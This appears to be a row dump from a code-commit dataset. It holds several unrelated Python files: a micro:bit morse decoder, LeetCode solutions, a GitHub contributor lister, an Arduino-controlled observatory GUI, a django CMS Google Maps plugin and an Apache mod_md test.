except TierProgram.MultipleObjectsReturned:
raise CommandError(
'There are multiple tier programs with threshold "{}"'.format(threshold)
)
financial_aid.tier_program = tier_program
financial_aid.save_and_log(None)
updated_count += 1
self.stdout.write(self.style.SUCCESS('Updated {} financial aid instances'.format(updated_count)))
| Python | 0 | |
57af6d6d8b4c67f7b437f512e4d8eb4ea66a20f9 | Add morse script | morse/morse.py | morse/morse.py | # Import modules
from microbit import *
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"s": "...",
"o": "---",
"m": "--",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7:" "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
pressed = 0
paused = 0
letters = []
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
current_letter = ""
if paused >= 200:
letters.append("_")
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
display.scroll("".join(letters))
paused = 0
pressed = 0
current_letter = ""
letters = []
| Python | 0.000001 | |
9609529e3a5c25c37be342d2bd1efe33e25128ff | Add IO file | IO.py | IO.py | import RPi.GPIO as GPIO
def gettemp():
return 80
def setfan(state):
pass
def setac(state):
if state:
# Always turn on the fan when the ac is on
setfan(True) | Python | 0.000001 | |
47fffb67871325f1b12d6150f12b2d9c44984837 | implement top contributors functionality in gitguard | gitguard.py | gitguard.py | import re
import subprocess
import github
"""
gitguard_extractor.py
Extracts data for the visualizer.
repo_link is in the format USER/REPO_NAME or ORGANIZATION/REPO_NAME
"""
REGEX_REPO_LINK_DELIMITER = '\s*/\s*'
def process_repo_link(repo_link):
#returns owner, repo_name
return re.compile(REGEX_REPO_LINK_DELIMITER).split(repo_link)
def get_top_contributor(repo_link):
return get_top_n_contributors(repo_link, 1)
def get_top_n_contributors(repo_link, n):
owner, repo = process_repo_link(repo_link)
# connect to github API
gh = github.GitHub()
contributors = gh.repos(owner)(repo).contributors.get()
answer = ''
persons = 0
for contributor in contributors:
answer += '%5d %s\n' % (contributor['contributions'], contributor['login'])
persons += 1
# only show top n contributors
if persons >= n:
break
answer += '\nTop contributors for %s!' % repo_link
return answer
| Python | 0 | |
a9fa88d11f5338f8662d4d6e7dc2103a80144be0 | Revert "Remove model" | table/models.py | table/models.py | from django.db import models
# Create your models here.
| Python | 0 | |
c821be39a3853bf8a14e8c4089904dfe633ad276 | Solve task #412 | 412.py | 412.py | class Solution(object):
def fizzBuzz(self, n):
"""
:type n: int
:rtype: List[str]
"""
def fizzBuzz(i, x):
return {1: str(i), 3: "Fizz", 5: "Buzz", 15: "FizzBuzz"}[x]
ans = []
x = 1
for i in range(1, n + 1):
if i % 3 == 0:
x *= 3
if i % 5 == 0:
x *= 5
ans.append(fizzBuzz(i, x))
x = 1
return ans
| Python | 0.999999 | |
e51322e7ee4afabee8b98137bc5e56b0a0f803ec | Solve #461 | 461.py | 461.py | class Solution(object):
def hammingDistance(self, x, y):
"""
:type x: int
:type y: int
:rtype: int
"""
x, y = list(bin(x)[2:]), list(bin(y)[2:])
s1 = list('0' * max(len(x), len(y)))
s2 = list('0' * max(len(x), len(y)))
s1[len(s1) - len(x):] = x
s2[len(s2) - len(y):] = y
k = 0
for i in range(len(s1)):
if s1[i] != s2[i]:
k += 1
return k
| Python | 0.999797 | |
2206f2dac5cb15c10fa59f14597133b6a0d3a314 | Create ALE.py | ALE.py | ALE.py | """
Asynchronous Learning Engine (ALE)
Supports PWS standard desktop (studio)
Mentor Queues
Load Balancing / Air Traffic Control
Courses / Flights
A mentor queue is a worker queue with
tasks pending, in process, complete.
The many subclasses of Task are only hinted
at in this overview.
Example Tasks (Transactions archiving to Chronofile):
Set start time on booked flight, notify students
Take Off
In-flight Services (the learning experience)
Land
Postmortem **/ Archive Stats
** sounds dire and we do try experimental courses
sometimes that "crash" but in this shoptalk it's
how we discuss any completed flight.
In-flight the students have a Call Bell for
special services. We run "shows" which in the
better schools are highly interactive and require
a lot of student activity. Passivism is a killer
when it comes to building confidence and competence
in one's tools, as Scott Gray would point out during
faculty meetings.
A normal / standard flight consists of working
through course materials in a PWS Studio with
asynchronous feedback from one or more mentors.
The "flight" (course) is also a unit of accounting
i.e. we containerize it in terms of fixed cost
overhead, tuition, compensation and so on. See
workflow diagrams.
ALE:
In the OO version, ALE is the root object, adding mixins as needed
Kirby Urner
Want graphics?
https://www.flickr.com/photos/kirbyurner/sets/72157654417641521
"""
class Flight(ALE):
pass
class AirTrafficUtils(ALE):
pass
class Passenger(AWS):
pass
class PWS:
pass
class Dispatcher(AirTrafficUtils):
pass
class Student(Passenger):
pass
class Task:
# Examples: Start Class, Submit Work, Annotate Materials, Return Work
pass
class Mentor(Oasis): # # Example mixin (ways to "phone home")
pass
class Course(Flight): # Expense Unit for accounting / bookkeeping
pass
class Oversight(ALE):
pass
class Admin(Oversight):
pass
class Recruiting(Mentor):
pass # Exhibited Mentors, free samples
class StudentSupport(Oversight):
pass # guidance functions ("Travel Agency")
| Python | 0.000001 | |
2e2a8f24cc8fc7e1614bf12a0d6d42c70d1efcf8 | Create GUI.py | GUI.py | GUI.py | #!/usr/bin/python
from Tkinter import *
root = Tk()
root.title("Elentirmo Observatory Controller v0.1")
dust_cover_text = StringVar()
dust_cover_text.set('Cover Closed')
flat_box_text = StringVar()
flat_box_text.set('Flat Box Off')
def dust_cover_open():
print "Opening"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to OPEN the dust cover."
ser.write("O")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
dust_cover_label.config(bg="Green")
dust_cover_text.set('Cover is Open')
def dust_cover_close():
print "Closing"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to CLOSE the dust cover."
ser.write("C")
print "Closing serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
dust_cover_label.config(bg="red")
dust_cover_text.set('Cover is closed')
def flat_on():
print "Activating flat box"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to turn on the flat box via relay."
ser.write("F")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
flat_box_label.config(bg="Green")
flat_box_text.set('Flat Box on')
def flat_off():
print "Dectivating flat box"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to turn off the flat box via relay."
ser.write("Q")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
flat_box_label.config(bg="red")
flat_box_text.set('Flat Box Off')
open_dust_cover_btn = Button(text=" Open Cover ", width=15, command=dust_cover_open)
open_dust_cover_btn.grid(row=0, column=0)
close_dust_cover_btn = Button(text=" Close Cover ", width=15, command=dust_cover_close)
close_dust_cover_btn.grid(row=1, column=0)
flat_box_on_btn = Button(text="Turn On Light", width=15, command=flat_on)
flat_box_on_btn.grid(row=0, column=2)
flat_box_off_btn = Button(text="Turn Off Light", width=15, command=flat_off)
flat_box_off_btn.grid(row=1, column=2)
status_label = Label(root, text=("Current Status"), width=15, fg="Black")
status_label.grid(row=2, column=1)
dust_cover_label = Label(root, textvariable=dust_cover_text, width=15, fg="Black", bg="Red")
dust_cover_label.grid(row=2, column=0)
flat_box_label = Label(root, textvariable=flat_box_text, width=15, fg="Black", bg="Red")
flat_box_label.grid(row=2, column=2)
root.mainloop()
| Python | 0 | |
6be70d01bdf58389db2a6adc4035f82669d02a61 | Allow use of GoogleMaps plugin without Multilingual support | cms/plugins/googlemap/cms_plugins.py | cms/plugins/googlemap/cms_plugins.py | from django.conf import settings
from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from cms.plugins.googlemap.models import GoogleMap
from cms.plugins.googlemap.settings import GOOGLE_MAPS_API_KEY
from django.forms.widgets import Media
class GoogleMapPlugin(CMSPluginBase):
model = GoogleMap
name = _("Google Map")
render_template = "cms/plugins/googlemap.html"
def render(self, context, instance, placeholder):
context.update({
'object':instance,
'placeholder':placeholder,
})
return context
def get_plugin_media(self, request, context, plugin):
if 'GOOGLE_MAPS_API_KEY' in context:
key = context['GOOGLE_MAPS_API_KEY']
else:
key = GOOGLE_MAPS_API_KEY
lang = getattr(request, 'LANGUAGE_CODE', settings.LANGUAGE_CODE[0:2])
return Media(js = ('http://maps.google.com/maps?file=api&v=2&key=%s&hl=%s' % (key, lang),))
plugin_pool.register_plugin(GoogleMapPlugin) | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from cms.plugins.googlemap.models import GoogleMap
from cms.plugins.googlemap.settings import GOOGLE_MAPS_API_KEY
from cms.plugins.googlemap import settings
from django.forms.widgets import Media
class GoogleMapPlugin(CMSPluginBase):
model = GoogleMap
name = _("Google Map")
render_template = "cms/plugins/googlemap.html"
def render(self, context, instance, placeholder):
context.update({
'object':instance,
'placeholder':placeholder,
})
return context
def get_plugin_media(self, request, context, plugin):
if 'GOOGLE_MAPS_API_KEY' in context:
key = context['GOOGLE_MAPS_API_KEY']
else:
key = GOOGLE_MAPS_API_KEY
return Media(js = ('http://maps.google.com/maps?file=api&v=2&key=%s&hl=%s' % (key, request.LANGUAGE_CODE),))
plugin_pool.register_plugin(GoogleMapPlugin) | Python | 0 |
5c952e7a54bcff7bcdbd3b2a2d85f1f93ce95242 | add first test: config+store | test/test_1100_conf_store.py | test/test_1100_conf_store.py | # test mod_md basic configurations
import os.path
import pytest
import re
import subprocess
import sys
import time
from ConfigParser import SafeConfigParser
from datetime import datetime
from httplib import HTTPConnection
from testbase import TestEnv
config = SafeConfigParser()
config.read('test.ini')
PREFIX = config.get('global', 'prefix')
def setup_module(module):
print("setup_module module:%s" % module.__name__)
TestEnv.init()
TestEnv.apache_err_reset()
TestEnv.APACHE_CONF_SRC = "test_configs_data"
status = TestEnv.apachectl(None, "start")
assert status == 0
def teardown_module(module):
print("teardown_module module:%s" % module.__name__)
status = TestEnv.apachectl(None, "stop")
class TestConf:
def setup_method(self, method):
print("setup_method: %s" % method.__name__)
(self.errors, self.warnings) = TestEnv.apache_err_count()
TestEnv.clear_store()
def teardown_method(self, method):
print("teardown_method: %s" % method.__name__)
# --------- add to store ---------
@pytest.mark.parametrize("confFile,dnsLists", [
("test_001", [["example.org", "www.example.org", "mail.example.org"]]),
("test_002", [["example.org", "www.example.org", "mail.example.org"], ["example2.org", "www.example2.org", "mail.example2.org"]])
])
def test_001(self, confFile, dnsLists):
# just one ManagedDomain definition
assert TestEnv.apachectl(confFile, "graceful") == 0
assert TestEnv.is_live(TestEnv.HTTPD_URL, 1)
for i in range (0, len(dnsLists)):
self._check_md(dnsLists[i][0], dnsLists[i], 1)
# --------- _utils_ ---------
def _new_errors(self):
(errors, warnings) = TestEnv.apache_err_count()
return errors - self.errors
def _new_warnings(self):
(errors, warnings) = TestEnv.apache_err_count()
return warnings - self.warnings
def _check_md(self, name, dnsList, state):
jout = TestEnv.a2md(["list"])['jout']
assert jout
output = jout['output']
mdFound = False
for i in range (0, len(output)):
md = output[i]
if name == md['name']:
mdFound = True
assert md['domains'] == dnsList
assert md['state'] == state
assert mdFound == True | Python | 0.000029 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.